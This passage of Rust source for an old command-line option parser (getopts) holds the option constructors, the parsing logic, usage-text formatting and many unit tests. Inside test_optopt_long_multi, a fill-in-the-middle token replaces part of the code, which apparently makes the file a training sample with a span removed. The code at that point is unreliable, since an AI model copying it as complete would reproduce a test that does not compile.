/// present and an argument was provided.
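    /// An illustrative sketch, assuming `optflagopt("o")` is among the opts
    /// passed to `getopts`:
    ///
    /// ~~~{.rust}
    /// // no `-o` on the command line => matches.opt_default("o", "out") == None
    /// // a bare `-o`                 => matches.opt_default("o", "out") == Some(~"out")
    /// // `-o file.txt`               => matches.opt_default("o", "out") == Some(~"file.txt")
    /// ~~~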
pub fn opt_default(&self, nm: &str, def: &str) -> Option<~str> {
let vals = self.opt_vals(nm);
if vals.is_empty() { return None; }
match vals[0] {
Val(ref s) => Some((*s).clone()),
_ => Some(def.to_owned())
}
}
}
fn is_arg(arg: &str) -> bool {
arg.len() > 1 && arg[0] == '-' as u8
}
fn find_opt(opts: &[Opt], nm: Name) -> Option<uint> {
// Search main options.
let pos = opts.iter().position(|opt| opt.name == nm);
if pos.is_some() {
return pos
}
// Search in aliases.
for candidate in opts.iter() {
if candidate.aliases.iter().position(|opt| opt.name == nm).is_some() {
return opts.iter().position(|opt| opt.name == candidate.name);
}
}
None
}
/// Create an option that is required and takes an argument.
pub fn reqopt(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Yes,
occur: Req,
aliases: ~[]
}
}
/// Create an option that is optional and takes an argument.
pub fn optopt(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Yes,
occur: Optional,
aliases: ~[]
}
}
/// Create an option that is optional and does not take an argument.
pub fn optflag(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: No,
occur: Optional,
aliases: ~[]
}
}
/// Create an option that is optional, does not take an argument,
/// and may occur multiple times.
pub fn optflagmulti(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: No,
occur: Multi,
aliases: ~[]
}
}
/// Create an option that is optional and takes an optional argument.
pub fn optflagopt(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Maybe,
occur: Optional,
aliases: ~[]
}
}
/// Create an option that is optional, takes an argument, and may occur
/// multiple times.
pub fn optmulti(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Yes,
occur: Multi,
aliases: ~[]
}
}
impl Fail_ {
/// Convert a `Fail_` enum into an error string.
pub fn to_err_msg(self) -> ~str {
match self {
ArgumentMissing(ref nm) => {
format!("Argument to option '{}' missing.", *nm)
}
UnrecognizedOption(ref nm) => {
format!("Unrecognized option: '{}'.", *nm)
}
OptionMissing(ref nm) => {
format!("Required option '{}' missing.", *nm)
}
OptionDuplicated(ref nm) => {
format!("Option '{}' given more than once.", *nm)
}
UnexpectedArgument(ref nm) => {
format!("Option '{}' does not take an argument.", *nm)
}
}
}
}
/// Parse command line arguments according to the provided options.
///
/// On success returns `Ok(Matches)`. Use methods such as `opt_present`,
/// `opt_str`, etc. to interrogate results. Returns `Err(Fail_)` on failure.
/// Use `to_err_msg` to get an error message.
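///
/// # Example
///
/// An illustrative sketch (assumes `args` holds the program arguments,
/// e.g. the tail of `std::os::args()`):
///
///     let opts = ~[optflag("help"), optopt("output")];
///     let matches = match getopts(args, opts) {
///         Ok(m) => m,
///         Err(f) => fail2!(f.to_err_msg())
///     };
///     if matches.opt_present("help") { /* print usage and return */ }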
pub fn getopts(args: &[~str], opts: &[Opt]) -> Result {
let n_opts = opts.len();
fn f(_x: uint) -> ~[Optval] { return ~[]; }
let mut vals = vec::from_fn(n_opts, f);
let mut free: ~[~str] = ~[];
let l = args.len();
let mut i = 0;
while i < l {
let cur = args[i].clone();
let curlen = cur.len();
if !is_arg(cur) {
free.push(cur);
} else if cur == ~"--" {
let mut j = i + 1;
while j < l { free.push(args[j].clone()); j += 1; }
break;
} else {
let mut names;
let mut i_arg = None;
if cur[1] == '-' as u8 {
let tail = cur.slice(2, curlen);
let tail_eq: ~[&str] = tail.split_iter('=').collect();
if tail_eq.len() <= 1 {
names = ~[Long(tail.to_owned())];
} else {
names =
~[Long(tail_eq[0].to_owned())];
i_arg = Some(tail_eq[1].to_owned());
}
} else {
let mut j = 1;
let mut last_valid_opt_id = None;
names = ~[];
while j < curlen {
let range = cur.char_range_at(j);
let opt = Short(range.ch);
/* In a series of potential options (eg. -aheJ), if we
see one which takes an argument, we assume all
subsequent characters make up the argument. This
allows options such as -L/usr/local/lib/foo to be
interpreted correctly
*/
match find_opt(opts, opt.clone()) {
Some(id) => last_valid_opt_id = Some(id),
None => {
let arg_follows =
last_valid_opt_id.is_some() &&
match opts[last_valid_opt_id.unwrap()]
.hasarg {
Yes | Maybe => true,
No => false
};
if arg_follows && j < curlen {
i_arg = Some(cur.slice(j, curlen).to_owned());
break;
} else {
last_valid_opt_id = None;
}
}
}
names.push(opt);
j = range.next;
}
}
let mut name_pos = 0;
for nm in names.iter() {
name_pos += 1;
let optid = match find_opt(opts, (*nm).clone()) {
Some(id) => id,
None => return Err(UnrecognizedOption(nm.to_str()))
};
match opts[optid].hasarg {
No => {
if i_arg.is_some() {
return Err(UnexpectedArgument(nm.to_str()));
}
vals[optid].push(Given);
}
Maybe => {
if i_arg.is_some() {
vals[optid].push(Val((i_arg.clone()).unwrap()));
} else if name_pos < names.len() ||
i + 1 == l || is_arg(args[i + 1]) {
vals[optid].push(Given);
} else { i += 1; vals[optid].push(Val(args[i].clone())); }
}
Yes => {
if i_arg.is_some() {
vals[optid].push(Val(i_arg.clone().unwrap()));
} else if i + 1 == l {
return Err(ArgumentMissing(nm.to_str()));
} else { i += 1; vals[optid].push(Val(args[i].clone())); }
}
}
}
}
i += 1;
}
i = 0u;
while i < n_opts {
let n = vals[i].len();
let occ = opts[i].occur;
if occ == Req {
if n == 0 {
return Err(OptionMissing(opts[i].name.to_str()));
}
}
if occ != Multi {
if n > 1 {
return Err(OptionDuplicated(opts[i].name.to_str()));
}
}
i += 1;
}
Ok(Matches {
opts: opts.to_owned(),
vals: vals,
free: free
})
}
/// A module which provides a way to specify descriptions and
/// groups of short and long option names, together.
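///
/// For example (illustrative), `groups::optflag("h", "help", "Print this help")`
/// describes `-h` and `--help` together in a single `OptGroup`.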
pub mod groups {
use getopts::{HasArg, Long, Maybe, Multi, No, Occur, Opt, Optional, Req};
use getopts::{Short, Yes};
/// One group of options, e.g., both -h and --help, along with
/// their shared description and properties.
#[deriving(Clone, Eq)]
pub struct OptGroup {
/// Short Name of the `OptGroup`
short_name: ~str,
/// Long Name of the `OptGroup`
long_name: ~str,
/// Hint
hint: ~str,
/// Description
desc: ~str,
/// Whether it has an argument
hasarg: HasArg,
/// How often it can occur
occur: Occur
}
impl OptGroup {
/// Translate OptGroup into Opt.
/// (Both short and long names correspond to different Opts).
pub fn long_to_short(&self) -> Opt {
let OptGroup {
short_name: short_name,
long_name: long_name,
hasarg: hasarg,
occur: occur,
_
} = (*self).clone();
match (short_name.len(), long_name.len()) {
(0,0) => fail2!("this long-format option was given no name"),
(0,_) => Opt {
name: Long((long_name)),
hasarg: hasarg,
occur: occur,
aliases: ~[]
},
(1,0) => Opt {
name: Short(short_name.char_at(0)),
hasarg: hasarg,
occur: occur,
aliases: ~[]
},
(1,_) => Opt {
name: Long((long_name)),
hasarg: hasarg,
occur: occur,
aliases: ~[
Opt {
name: Short(short_name.char_at(0)),
hasarg: hasarg,
occur: occur,
aliases: ~[]
}
]
},
(_,_) => fail2!("something is wrong with the long-form opt")
}
}
}
/// Create a long option that is required and takes an argument.
pub fn reqopt(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Yes,
occur: Req
}
}
/// Create a long option that is optional and takes an argument.
pub fn optopt(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Yes,
occur: Optional
}
}
/// Create a long option that is optional and does not take an argument.
pub fn optflag(short_name: &str, long_name: &str, desc: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: ~"",
desc: desc.to_owned(),
hasarg: No,
occur: Optional
}
}
/// Create a long option that can occur more than once and does not
/// take an argument.
pub fn optflagmulti(short_name: &str, long_name: &str, desc: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: ~"",
desc: desc.to_owned(),
hasarg: No,
occur: Multi
}
}
/// Create a long option that is optional and takes an optional argument.
pub fn optflagopt(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Maybe,
occur: Optional
}
}
/// Create a long option that is optional, takes an argument, and may occur
/// multiple times.
pub fn optmulti(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Yes,
occur: Multi
}
}
/// Parse command line args with the provided long format options.
pub fn getopts(args: &[~str], opts: &[OptGroup]) -> ::getopts::Result {
::getopts::getopts(args, opts.map(|x| x.long_to_short()))
}
/// Derive a usage message from a set of long options.
pub fn usage(brief: &str, opts: &[OptGroup]) -> ~str {
let desc_sep = "\n" + " ".repeat(24);
let mut rows = opts.iter().map(|optref| {
let OptGroup{short_name: short_name,
long_name: long_name,
hint: hint,
desc: desc,
hasarg: hasarg,
_} = (*optref).clone();
let mut row = " ".repeat(4);
// short option
match short_name.len() {
0 => {}
1 => {
row.push_char('-');
row.push_str(short_name);
row.push_char(' ');
}
_ => fail2!("the short name should only be 1 ascii char long"),
}
// long option
match long_name.len() {
0 => {}
_ => {
row.push_str("--");
row.push_str(long_name);
row.push_char(' ');
}
}
// arg
match hasarg {
No => {}
Yes => row.push_str(hint),
Maybe => {
row.push_char('[');
row.push_str(hint);
row.push_char(']');
}
}
// FIXME: #5516 should be graphemes not codepoints
// here we just need to indent the start of the description
let rowlen = row.char_len();
if rowlen < 24 {
do (24 - rowlen).times {
row.push_char(' ')
}
} else {
row.push_str(desc_sep)
}
// Normalize desc to contain words separated by one space character
let mut desc_normalized_whitespace = ~"";
for word in desc.word_iter() {
desc_normalized_whitespace.push_str(word);
desc_normalized_whitespace.push_char(' ');
}
// FIXME: #5516 should be graphemes not codepoints
let mut desc_rows = ~[];
do each_split_within(desc_normalized_whitespace, 54) |substr| {
desc_rows.push(substr.to_owned());
true
};
// FIXME: #5516 should be graphemes not codepoints
// wrapped description
row.push_str(desc_rows.connect(desc_sep));
row
});
format!("{}\n\nOptions:\n{}\n", brief, rows.collect::<~[~str]>().connect("\n"))
}
/// Splits a string into substrings with possibly internal whitespace,
/// each of them at most `lim` bytes long. The substrings have leading and trailing
/// whitespace removed, and are only cut at whitespace boundaries.
///
/// Note: Function was moved here from `std::str` because this module is the only place that
/// uses it, and because it was too specific for a general string function.
///
/// # Failure
///
/// Fails during iteration if the string contains a non-whitespace
/// sequence longer than the limit.
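///
/// For example (illustrative): with `lim = 10`, the string
/// `"hello world foo"` is yielded as `"hello"` and then `"world foo"`.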
fn each_split_within<'a>(ss: &'a str,
lim: uint,
it: &fn(&'a str) -> bool) -> bool {
// Just for fun, let's write this as a state machine:
enum SplitWithinState {
A, // leading whitespace, initial state
B, // words
C, // internal and trailing whitespace
}
enum Whitespace {
Ws, // current char is whitespace
Cr // current char is not whitespace
}
enum LengthLimit {
UnderLim, // current char makes current substring still fit in limit
OverLim // current char makes current substring no longer fit in limit
}
let mut slice_start = 0;
let mut last_start = 0;
let mut last_end = 0;
let mut state = A;
let mut fake_i = ss.len();
let mut lim = lim;
let mut cont = true;
let slice: &fn() = || { cont = it(ss.slice(slice_start, last_end)) };
// if the limit is larger than the string, lower it to save cycles
if lim >= fake_i {
lim = fake_i;
}
let machine: &fn((uint, char)) -> bool = |(i, c)| {
let whitespace = if ::std::char::is_whitespace(c) { Ws } else { Cr };
let limit = if (i - slice_start + 1) <= lim { UnderLim } else { OverLim };
state = match (state, whitespace, limit) {
(A, Ws, _) => { A }
(A, Cr, _) => { slice_start = i; last_start = i; B }
(B, Cr, UnderLim) => { B }
(B, Cr, OverLim) if (i - last_start + 1) > lim
=> fail2!("word starting with {} longer than limit!",
ss.slice(last_start, i + 1)),
(B, Cr, OverLim) => { slice(); slice_start = last_start; B }
(B, Ws, UnderLim) => { last_end = i; C }
(B, Ws, OverLim) => { last_end = i; slice(); A }
(C, Cr, UnderLim) => { last_start = i; B }
(C, Cr, OverLim) => { slice(); slice_start = i; last_start = i; last_end = i; B }
(C, Ws, OverLim) => { slice(); A }
(C, Ws, UnderLim) => { C }
};
cont
};
ss.char_offset_iter().advance(|x| machine(x));
// Let the automaton 'run out' by supplying trailing whitespace
while cont && match state { B | C => true, A => false } {
machine((fake_i, ' '));
fake_i += 1;
}
return cont;
}
#[test]
fn test_split_within() {
fn t(s: &str, i: uint, u: &[~str]) {
let mut v = ~[];
do each_split_within(s, i) |s| { v.push(s.to_owned()); true };
assert!(v.iter().zip(u.iter()).all(|(a,b)| a == b));
}
t("", 0, []);
t("", 15, []);
t("hello", 15, [~"hello"]);
t("\nMary had a little lamb\nLittle lamb\n", 15,
[~"Mary had a", ~"little lamb", ~"Little lamb"]);
t("\nMary had a little lamb\nLittle lamb\n", ::std::uint::max_value,
[~"Mary had a little lamb\nLittle lamb"]);
}
} // end groups module
#[cfg(test)]
mod tests {
use getopts::groups::OptGroup;
use getopts::*;
use std::result::{Err, Ok};
use std::result;
fn check_fail_type(f: Fail_, ft: FailType) {
match f {
ArgumentMissing(_) => assert!(ft == ArgumentMissing_),
UnrecognizedOption(_) => assert!(ft == UnrecognizedOption_),
OptionMissing(_) => assert!(ft == OptionMissing_),
OptionDuplicated(_) => assert!(ft == OptionDuplicated_),
UnexpectedArgument(_) => assert!(ft == UnexpectedArgument_)
}
}
// Tests for reqopt
#[test]
fn test_reqopt_long() {
let args = ~[~"--test=20"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("test"));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
}
_ => { fail2!("test_reqopt_long failed"); }
}
}
#[test]
fn test_reqopt_long_missing() {
let args = ~[~"blah"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_long_no_arg() {
let args = ~[~"--test"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_long_multi() {
let args = ~[~"--test=20", ~"--test=30"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_short() {
let args = ~[~"-t", ~"20"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("t"));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_reqopt_short_missing() {
let args = ~[~"blah"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_short_no_arg() {
let args = ~[~"-t"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_short_multi() {
let args = ~[~"-t", ~"20", ~"-t", ~"30"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
// Tests for optopt
#[test]
fn test_optopt_long() {
let args = ~[~"--test=20"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("test"));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optopt_long_missing() {
let args = ~[~"blah"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optopt_long_no_arg() {
let args = ~[~"--test"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optopt_long_multi() {
let args = ~[~"--test=20", ~"--test=30"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {<|fim▁hole|> }
}
#[test]
fn test_optopt_short() {
let args = ~[~"-t", ~"20"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("t")));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optopt_short_missing() {
let args = ~[~"blah"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optopt_short_no_arg() {
let args = ~[~"-t"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optopt_short_multi() {
let args = ~[~"-t", ~"20", ~"-t", ~"30"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
// Tests for optflag
#[test]
fn test_optflag_long() {
let args = ~[~"--test"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optflag_long_missing() {
let args = ~[~"blah"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optflag_long_arg() {
let args = ~[~"--test=20"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => {
error2!("{:?}", f.clone().to_err_msg());
check_fail_type(f, UnexpectedArgument_);
}
_ => fail2!()
}
}
#[test]
fn test_optflag_long_multi() {
let args = ~[~"--test", ~"--test"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
#[test]
fn test_optflag_short() {
let args = ~[~"-t"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optflag_short_missing() {
let args = ~[~"blah"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optflag_short_arg() {
let args = ~[~"-t", ~"20"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
// The next variable after the flag is just a free argument
assert!(m.free[0] == ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optflag_short_multi() {
let args = ~[~"-t", ~"-t"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
// Tests for optflagmulti
#[test]
fn test_optflagmulti_short1() {
let args = ~[~"-v"];
let opts = ~[optflagmulti("v")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("v"), 1);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_short2a() {
let args = ~[~"-v", ~"-v"];
let opts = ~[optflagmulti("v")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("v"), 2);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_short2b() {
let args = ~[~"-vv"];
let opts = ~[optflagmulti("v")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("v"), 2);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_long1() {
let args = ~[~"--verbose"];
let opts = ~[optflagmulti("verbose")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("verbose"), 1);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_long2() {
let args = ~[~"--verbose", ~"--verbose"];
let opts = ~[optflagmulti("verbose")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("verbose"), 2);
}
_ => fail2!()
}
}
// Tests for optmulti
#[test]
fn test_optmulti_long() {
let args = ~[~"--test=20"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("test")));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optmulti_long_missing() {
let args = ~[~"blah"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optmulti_long_no_arg() {
let args = ~[~"--test"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optmulti_long_multi() {
let args = ~[~"--test=20", ~"--test=30"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("test"));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
let pair = m.opt_strs("test");
assert!(pair[0] == ~"20");
assert!(pair[1] == ~"30");
}
_ => fail2!()
}
}
#[test]
fn test_optmulti_short() {
let args = ~[~"-t", ~"20"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("t")));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optmulti_short_missing() {
let args = ~[~"blah"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optmulti_short_no_arg() {
let args = ~[~"-t"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optmulti_short_multi() {
let args = ~[~"-t", ~"20", ~"-t", ~"30"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("t")));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
let pair = m.opt_strs("t");
assert!(pair[0] == ~"20");
assert!(pair[1] == ~"30");
}
_ => fail2!()
}
}
#[test]
fn test_unrecognized_option_long() {
let args = ~[~"--untest"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, UnrecognizedOption_),
_ => fail2!()
}
}
#[test]
fn test_unrecognized_option_short() {
let args = ~[~"-t"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, UnrecognizedOption_),
_ => fail2!()
}
}
#[test]
fn test_combined() {
let args =
~[~"prog", ~"free1", ~"-s", ~"20", ~"free2",
~"--flag", ~"--long=30", ~"-f", ~"-m", ~"40",
~"-m", ~"50", ~"-n", ~"-A B", ~"-n", ~"-60 70"];
let opts =
~[optopt("s"), optflag("flag"), reqopt("long"),
optflag("f"), optmulti("m"), optmulti("n"),
optopt("notpresent")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.free[0] == ~"prog");
assert!(m.free[1] == ~"free1");
assert_eq!(m.opt_str("s").unwrap(), ~"20");
assert!(m.free[2] == ~"free2");
assert!((m.opt_present("flag")));
assert_eq!(m.opt_str("long").unwrap(), ~"30");
assert!((m.opt_present("f")));
let pair = m.opt_strs("m");
assert!(pair[0] == ~"40");
assert!(pair[1] == ~"50");
let pair = m.opt_strs("n");
assert!(pair[0] == ~"-A B");
assert!(pair[1] == ~"-60 70");
assert!((!m.opt_present("notpresent")));
}
_ => fail2!()
}
}
#[test]
fn test_multi() {
let opts = ~[optopt("e"), optopt("encrypt"), optopt("f")];
let args_single = ~[~"-e", ~"foo"];
let matches_single = &match getopts(args_single, opts) {
result::Ok(m) => m,
result::Err(_) => fail2!()
};
assert!(matches_single.opts_present([~"e"]));
assert!(matches_single.opts_present([~"encrypt", ~"e"]));
assert!(matches_single.opts_present([~"e", ~"encrypt"]));
assert!(!matches_single.opts_present([~"encrypt"]));
assert!(!matches_single.opts_present([~"thing"]));
assert!(!matches_single.opts_present([]));
assert_eq!(matches_single.opts_str([~"e"]).unwrap(), ~"foo");
assert_eq!(matches_single.opts_str([~"e", ~"encrypt"]).unwrap(), ~"foo");
assert_eq!(matches_single.opts_str([~"encrypt", ~"e"]).unwrap(), ~"foo");
let args_both = ~[~"-e", ~"foo", ~"--encrypt", ~"foo"];
let matches_both = &match getopts(args_both, opts) {
result::Ok(m) => m,
result::Err(_) => fail2!()
};
assert!(matches_both.opts_present([~"e"]));
assert!(matches_both.opts_present([~"encrypt"]));
assert!(matches_both.opts_present([~"encrypt", ~"e"]));
assert!(matches_both.opts_present([~"e", ~"encrypt"]));
assert!(!matches_both.opts_present([~"f"]));
assert!(!matches_both.opts_present([~"thing"]));
assert!(!matches_both.opts_present([]));
assert_eq!(matches_both.opts_str([~"e"]).unwrap(), ~"foo");
assert_eq!(matches_both.opts_str([~"encrypt"]).unwrap(), ~"foo");
assert_eq!(matches_both.opts_str([~"e", ~"encrypt"]).unwrap(), ~"foo");
assert_eq!(matches_both.opts_str([~"encrypt", ~"e"]).unwrap(), ~"foo");
}
#[test]
fn test_nospace() {
let args = ~[~"-Lfoo", ~"-M."];
let opts = ~[optmulti("L"), optmulti("M")];
let matches = &match getopts(args, opts) {
result::Ok(m) => m,
result::Err(_) => fail2!()
};
assert!(matches.opts_present([~"L"]));
assert_eq!(matches.opts_str([~"L"]).unwrap(), ~"foo");
assert!(matches.opts_present([~"M"]));
assert_eq!(matches.opts_str([~"M"]).unwrap(), ~".");
}
#[test]
fn test_groups_reqopt() {
let opt = groups::reqopt("b", "banana", "some bananas", "VAL");
assert!(opt == OptGroup { short_name: ~"b",
long_name: ~"banana",
hint: ~"VAL",
desc: ~"some bananas",
hasarg: Yes,
occur: Req })
}
#[test]
fn test_groups_optopt() {
let opt = groups::optopt("a", "apple", "some apples", "VAL");
assert!(opt == OptGroup { short_name: ~"a",
long_name: ~"apple",
hint: ~"VAL",
desc: ~"some apples",
hasarg: Yes,
occur: Optional })
}
#[test]
fn test_groups_optflag() {
let opt = groups::optflag("k", "kiwi", "some kiwis");
assert!(opt == OptGroup { short_name: ~"k",
long_name: ~"kiwi",
hint: ~"",
desc: ~"some kiwis",
hasarg: No,
occur: Optional })
}
#[test]
fn test_groups_optflagopt() {
let opt = groups::optflagopt("p", "pineapple", "some pineapples", "VAL");
assert!(opt == OptGroup { short_name: ~"p",
long_name: ~"pineapple",
hint: ~"VAL",
desc: ~"some pineapples",
hasarg: Maybe,
occur: Optional })
}
#[test]
fn test_groups_optmulti() {
let opt = groups::optmulti("l", "lime", "some limes", "VAL");
assert!(opt == OptGroup { short_name: ~"l",
long_name: ~"lime",
hint: ~"VAL",
desc: ~"some limes",
hasarg: Yes,
occur: Multi })
}
#[test]
fn test_groups_long_to_short() {
let mut short = reqopt("banana");
short.aliases = ~[reqopt("b")];
let verbose = groups::reqopt("b", "banana", "some bananas", "VAL");
assert_eq!(verbose.long_to_short(), short);
}
#[test]
fn test_groups_getopts() {
let mut banana = reqopt("banana");
banana.aliases = ~[reqopt("b")];
let mut apple = optopt("apple");
apple.aliases = ~[optopt("a")];
let mut kiwi = optflag("kiwi");
kiwi.aliases = ~[optflag("k")];
let short = ~[
banana,
apple,
kiwi,
optflagopt("p"),
optmulti("l")
];
let verbose = ~[
groups::reqopt("b", "banana", "Desc", "VAL"),
groups::optopt("a", "apple", "Desc", "VAL"),
groups::optflag("k", "kiwi", "Desc"),
groups::optflagopt("p", "", "Desc", "VAL"),
groups::optmulti("l", "", "Desc", "VAL"),
];
let sample_args = ~[~"--kiwi", ~"15", ~"--apple", ~"1", ~"k",
~"-p", ~"16", ~"l", ~"35"];
// FIXME #4681: sort options here?
assert!(getopts(sample_args, short)
== groups::getopts(sample_args, verbose));
}
#[test]
fn test_groups_aliases_long_and_short() {
let opts = ~[
groups::optflagmulti("a", "apple", "Desc"),
];
let args = ~[~"-a", ~"--apple", ~"-a"];
let matches = groups::getopts(args, opts).unwrap();
assert_eq!(3, matches.opt_count("a"));
assert_eq!(3, matches.opt_count("apple"));
}
#[test]
fn test_groups_usage() {
let optgroups = ~[
groups::reqopt("b", "banana", "Desc", "VAL"),
groups::optopt("a", "012345678901234567890123456789",
"Desc", "VAL"),
groups::optflag("k", "kiwi", "Desc"),
groups::optflagopt("p", "", "Desc", "VAL"),
groups::optmulti("l", "", "Desc", "VAL"),
];
let expected =
~"Usage: fruits
Options:
-b --banana VAL Desc
-a --012345678901234567890123456789 VAL
Desc
-k --kiwi Desc
-p [VAL] Desc
-l VAL Desc
";
let generated_usage = groups::usage("Usage: fruits", optgroups);
